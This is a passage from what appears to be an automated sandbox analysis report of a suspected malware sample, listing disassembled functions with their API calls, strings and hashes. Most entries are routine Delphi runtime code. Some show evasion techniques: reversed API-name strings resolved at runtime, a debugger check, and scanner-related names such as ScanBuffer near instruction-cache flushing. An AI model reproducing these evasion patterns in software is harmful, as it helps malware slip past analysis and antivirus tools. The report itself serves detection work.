                                                                                              • bytes: , xrefs: 031A275D
                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 031A2849
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                              • API String ID: 0-2723507874
                                                                                              • Opcode ID: 7f857ef551ca2d55c22f350df488b8bd6db73272bd588353ca6fe96b3d7cfea6
                                                                                              • Instruction ID: 2231315e52af583b6564cfaed6dcf2b7a9e5e93bb09cfa18c7d86eaed24f3129
                                                                                              • Opcode Fuzzy Hash: 7f857ef551ca2d55c22f350df488b8bd6db73272bd588353ca6fe96b3d7cfea6
                                                                                              • Instruction Fuzzy Hash: 6D71D738A047688FDB21DA2CCC84BD8BAF4EB0D752F1448E5E54DEB241DB758AC6CB51
                                                                                              Function 031A5908 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 139stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpyn.KERNEL32(?,?,?), ref: 031A596C
                                                                                              • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 031A59D0
                                                                                              • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 031A5A06
                                                                                              • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 031A5A6B
                                                                                              • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 031A5A77
                                                                                              • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 031A5A99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$lstrlen
                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                              • API String ID: 4046762626-1565342463
                                                                                              • Opcode ID: c63591987aeeae03e60ffcc5e2ea22094fde71de9341a193948efe6db4ecf5dc
                                                                                              • Instruction ID: 20e9d213faf093660da88840d5ec49aaf69fb9a0de71157b0e43839f26c12848
                                                                                              • Opcode Fuzzy Hash: c63591987aeeae03e60ffcc5e2ea22094fde71de9341a193948efe6db4ecf5dc
                                                                                              • Instruction Fuzzy Hash: BA41637DE04A19BFDB20DAECCC88ADEB7BDAF0D252F1445A6D584DB241D770DA408B50
                                                                                              Function 031ABDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,031AC08B,?,?,00000000,00000000), ref: 031ABDF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 635194068-2493093252
                                                                                              • Opcode ID: 47eb040b796b09de8e8b356345a84d38b948202f80cb8616b1913285d39742d8
                                                                                              • Instruction ID: 366eca345297a49900364e2ae61c4fa1d436df14b221be630ab82113e2bc8a55
                                                                                              • Opcode Fuzzy Hash: 47eb040b796b09de8e8b356345a84d38b948202f80cb8616b1913285d39742d8
                                                                                              • Instruction Fuzzy Hash: 25614A3DB00B489BCB00EBACED90A9F76A69F8C302F509475A501EF745CB79DA09D791
                                                                                              Function 031BAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031BB000
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 031BB017
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031BB0AB
                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 031BB0B7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 031BB0CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$HandleModule
                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                              • API String ID: 2226866862-113032527
                                                                                              • Opcode ID: a54e10121a73725663ad751ca1afe894334bf8ebd560171999239c4854fefdc6
                                                                                              • Instruction ID: d555c034065b9aebe9c42f48a46df4bd163e72f73424030f850b57c206f3e4db
                                                                                              • Opcode Fuzzy Hash: a54e10121a73725663ad751ca1afe894334bf8ebd560171999239c4854fefdc6
                                                                                              • Instruction Fuzzy Hash: 19317475A08705BBDB20DB69CC85FA9B7BCAF0D754F048154FA64AB6C1D370A940CBA0
                                                                                              Function 031AAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031AAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                                • Part of subcall function 031AAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                                • Part of subcall function 031AAD3C: GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                                • Part of subcall function 031AAD3C: LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              • CharToOemA.USER32(?,?), ref: 031AAEFB
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 031AAF18
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF1E
                                                                                              • GetStdHandle.KERNEL32(000000F4,031AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF33
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,031AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF39
                                                                                              • LoadStringA.USER32(00000000,031A67D8,?,00000040), ref: 031AAF5B
                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 031AAF71
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 185507032-0
                                                                                              • Opcode ID: 752c5c609a5d9619336dbee9e19652a50ae65012b93fe2e0096a8ceb0bdd3acc
                                                                                              • Instruction ID: 2828c78888addf563511691ae98986d789c8490878d0dfa686b4456e89418535
                                                                                              • Opcode Fuzzy Hash: 752c5c609a5d9619336dbee9e19652a50ae65012b93fe2e0096a8ceb0bdd3acc
                                                                                              • Instruction Fuzzy Hash: 14115ABE518B00BFD200FBA8DC85F9F77ACAF48602F444925B754DA0E1DB74E9448762
                                                                                              Function 031A435C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38filewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423,?,?,?,?,?,?,?,031A44CE,031A2CF3), ref: 031A4395
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423,?,?,?,?,?,?,?,031A44CE), ref: 031A439B
                                                                                              • GetStdHandle.KERNEL32(000000F5,031A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423), ref: 031A43B0
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,031A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423), ref: 031A43B6
                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,031CE754,00000000), ref: 031A43D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$Message
                                                                                              • String ID: Runtime error at 00000000
                                                                                              • API String ID: 1570097196-1393363852
                                                                                              • Opcode ID: c59f2a776ffa5e4a9a4322a442fc40653225d2e1734f4a2ae6f2a1479cb803ac
                                                                                              • Instruction ID: b92b165f0c0f5a946658c749c895a95d3c3debcb9ba76b0dc0ca4771a273bda7
                                                                                              • Opcode Fuzzy Hash: c59f2a776ffa5e4a9a4322a442fc40653225d2e1734f4a2ae6f2a1479cb803ac
                                                                                              • Instruction Fuzzy Hash: D7F0246C6957907BF720F2BA6C0AF5D265C4B1CF23F944319F2209C0C68BE040C48772
                                                                                              Function 031AE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031AE625
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031AE641
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 031AE67A
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031AE6F7
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 031AE710
                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 031AE745
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction ID: 2a10e1220d2fd04a1442aea74c5748e05b0265ed3a0e18170d394d76d5989043
                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction Fuzzy Hash: 5F51087DA01A299BCB26DB5CD990BD9B3BCAF4C201F0445D5E509EB201DB30AF858FA0
                                                                                              Function 031AAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031AACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 031AAB2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: eeee$ggg$yyyy
                                                                                              • API String ID: 635194068-1253427255
                                                                                              • Opcode ID: 6b5a3b0b41cfc28c7053a1b64dc902f1f590196f4b803434af440213fc70367c
                                                                                              • Instruction ID: 0bd21a3f429f921a47d35cc73b53f24d39ca1ead303ef71f079ffc450b426c72
                                                                                              • Opcode Fuzzy Hash: 6b5a3b0b41cfc28c7053a1b64dc902f1f590196f4b803434af440213fc70367c
                                                                                              • Instruction Fuzzy Hash: 4A41F0BC714F484BE716EABD88902BEB7EADF8D103F194065D442DB348EF64D901C261
                                                                                              Function 031B8274 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                              • API String ID: 190572456-1372893251
                                                                                              • Opcode ID: 87fdbb3a4ff3ad3d7ee1b1ff0a08409c00110bae913836a1efc146a811a0e939
                                                                                              • Instruction ID: a0dfd5cf710dc1c4e1958320d964d77ce5ad379fb6397ad67905ee844f713950
                                                                                              • Opcode Fuzzy Hash: 87fdbb3a4ff3ad3d7ee1b1ff0a08409c00110bae913836a1efc146a811a0e939
                                                                                              • Instruction Fuzzy Hash: D801287D604748BFDB10EBA9EC51E9EBBBDEB4CA11F518460E804DB741DB70A900CA68
                                                                                              Function 031BF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,031BFAEB,UacInitialize,03223160,031CB7B8,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,ScanString,03223160,031CB7B8,Initialize), ref: 031BF6EE
                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031BF700
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                              • API String ID: 1646373207-2367923768
                                                                                              • Opcode ID: eca8e670bd653ece8aa695111de99887afacf6a5b61f69df5a44cf1bfca155e6
                                                                                              • Instruction ID: e1a904084046845e42c9768d603f79d82ff61bd6aace06bd44aec48821b84517
                                                                                              • Opcode Fuzzy Hash: eca8e670bd653ece8aa695111de99887afacf6a5b61f69df5a44cf1bfca155e6
                                                                                              • Instruction Fuzzy Hash: 4AD012EA360B502FDE00F6FC2CC589D1298896C42B3280EA0F03ACA093E7A6891B5054
                                                                                              Function 031AC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,031CD10B,00000000,031CD11E), ref: 031AC47A
                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 031AC48B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                              • API String ID: 1646373207-3712701948
                                                                                              • Opcode ID: 1fc5b606dde7084deabf999cc51d98ffd68bd7245bc53cd0afeb40f92158d3ed
                                                                                              • Instruction ID: 36f22c28a7154e2bda7e7b6ec7d25186d8e3f4a1ac4b2469dcb687a760259db0
                                                                                              • Opcode Fuzzy Hash: 1fc5b606dde7084deabf999cc51d98ffd68bd7245bc53cd0afeb40f92158d3ed
                                                                                              • Instruction Fuzzy Hash: D1D05EAC214F045FDA00FABD548063539D8A30C313F084025E412D9102E76654408FF8
                                                                                              Function 031AE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031AE297
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031AE2B3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031AE32A
                                                                                              • VariantClear.OLEAUT32(?), ref: 031AE353
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                              • String ID:
                                                                                              • API String ID: 920484758-0
                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction ID: 56c1e98b06e724fa7dd7ade6921ca321c737fff8964df58a529dfaccb02a50bb
                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction Fuzzy Hash: 9541FB79A01B299BCB62DB5CCD90BC9B3BCAF4D311F0441D5E549A7211DB34AF818F60
                                                                                              Function 031AAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                              • LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: d608d48e93b76ee9a5d3f5a03c0bb77bd64ae0c62456da3f4d5d713eaddbac87
                                                                                              • Instruction ID: 99a71c9ffde392dd03ac2adb0852e5a00858da7ffce522a67bf09932babb83c1
                                                                                              • Opcode Fuzzy Hash: d608d48e93b76ee9a5d3f5a03c0bb77bd64ae0c62456da3f4d5d713eaddbac87
                                                                                              • Instruction Fuzzy Hash: BA413979A00B589BDB21EB6CDC84BDAB7F8AF0C202F0440E5A548EB241D7749F84CF50
                                                                                              Function 031AAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                              • LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: 3fa7e7a42792379d3b2991a9d2e427262dfbd8d1f1a5c68dc0a87f231c617ca1
                                                                                              • Instruction ID: 4d908c71c096a01b51ab7bb47982e44d77e36a71b44ac13a414252c0df9b4c93
                                                                                              • Opcode Fuzzy Hash: 3fa7e7a42792379d3b2991a9d2e427262dfbd8d1f1a5c68dc0a87f231c617ca1
                                                                                              • Instruction Fuzzy Hash: 27412979A40B589BDB61EB6CDC84BDAB7F8AF1C202F0440E5A548EB241DB749F84CB50
                                                                                              Function 031AAA50 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031AAAE7,?,?,00000000), ref: 031AAA68
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,031AAAE7,?,?,00000000), ref: 031AAA98
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000999C,00000000,00000000,00000004,00000000,031AAAE7,?,?,00000000), ref: 031AAAC1
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_000099D8,00000000,00000000,00000003), ref: 031AAACC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread$CalendarEnumInfo
                                                                                              • String ID:
                                                                                              • API String ID: 1139405593-0
                                                                                              • Opcode ID: b77a1c318a7b9dfdf275f14b01488b8341a2e2de5fa4a8a814424cef2df9de41
                                                                                              • Instruction ID: 4630af882e48244d7591653a492eda18b1ef07e210f99c514a3e56500f9ee9c8
                                                                                              • Opcode Fuzzy Hash: b77a1c318a7b9dfdf275f14b01488b8341a2e2de5fa4a8a814424cef2df9de41
                                                                                              • Instruction Fuzzy Hash: FA01F2BD200F847FE712EEACCD11B6E36ACDF8D622F510560E514EA6C0DB659E00C265
                                                                                              Function 031A1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8cfdc2812cc0e99985739797b5195dd592175ba863bd65274f188f79a98c6a19
                                                                                              • Instruction ID: 4a76aa2d8e70e34f5d1f9621c00400bed33b2e2b566b39b421e4678c998eb4a5
                                                                                              • Opcode Fuzzy Hash: 8cfdc2812cc0e99985739797b5195dd592175ba863bd65274f188f79a98c6a19
                                                                                              • Instruction Fuzzy Hash: 96A1C26E710F502BD719EA7C9C843BDB2C69B8C263F2D827EE115CB385EB64C9558240
                                                                                              Function 031A94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,031A95DA), ref: 031A9572
                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,031A95DA), ref: 031A9578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: yyyy
                                                                                              • API String ID: 3303714858-3145165042
                                                                                              • Opcode ID: 220cdae6ac18579b2ca4b64222149f708701671ac487fe4e8b5a10efcd8ec118
                                                                                              • Instruction ID: d9dda53101535cfa50315942a090946b96f9d5fade0b20ec080c1fe71f38dcfe
                                                                                              • Opcode Fuzzy Hash: 220cdae6ac18579b2ca4b64222149f708701671ac487fe4e8b5a10efcd8ec118
                                                                                              • Instruction Fuzzy Hash: C0214179A04A589FCB10DF6DC942AAEB3A8EF0D711F5504A6E805EB340DB709E80CA65
                                                                                              Function 031A3598 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                              • API String ID: 3535843008-4173385793
                                                                                              • Opcode ID: 5ae6159b691876ecae33d38485e779d5c458c5368083f0085a7208e8615a3b74
                                                                                              • Instruction ID: b1b0497234cff445cb583d77e6047dc8ef88ea870443ca31780376e81095f3e0
                                                                                              • Opcode Fuzzy Hash: 5ae6159b691876ecae33d38485e779d5c458c5368083f0085a7208e8615a3b74
                                                                                              • Instruction Fuzzy Hash: 3D01B57DA50758BFDB11DF948D02BBDB7ECD70CB12F100562BA14D6680E774AA10C669
                                                                                              Function 031B8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CacheFlushHandleInstructionModule
                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                              • API String ID: 1384192982-184458249
                                                                                              • Opcode ID: f9c4ab92d7e4bd928fbb2f7fb6a8ded8d769fbf6ea824ebfd71b25c74bac2bef
                                                                                              • Instruction ID: 32040836f43111c089e4ca455c5f11f93103eafebfc5e3e7df9e415a033b7343
                                                                                              • Opcode Fuzzy Hash: f9c4ab92d7e4bd928fbb2f7fb6a8ded8d769fbf6ea824ebfd71b25c74bac2bef
                                                                                              • Instruction Fuzzy Hash: B9014B79208788BFDB10EFA9EC51F9E77ACE70CA00F519060F904DA651DB70AD008A24
                                                                                              Function 031B81CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                              • API String ID: 667068680-1952140341
                                                                                              • Opcode ID: eef721b4a24301faee66231290fb8fb8d7a912189e84290a71b623e46dbf27a4
                                                                                              • Instruction ID: 7c1ccbc37b38f8f7f0942aef902dcfc42f94d75940a78262b84a3ec521769093
                                                                                              • Opcode Fuzzy Hash: eef721b4a24301faee66231290fb8fb8d7a912189e84290a71b623e46dbf27a4
                                                                                              • Instruction Fuzzy Hash: 4AF04978608B44AFDB11EBA9EC55D99B7FCEB4EA01B5144A0E8009A755DB70AE00C624

                                                                                              Execution Graph

                                                                                              Execution Coverage:8.9%
                                                                                              Dynamic/Decrypted Code Coverage:60.3%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:431
                                                                                              Total number of Limit Nodes:45
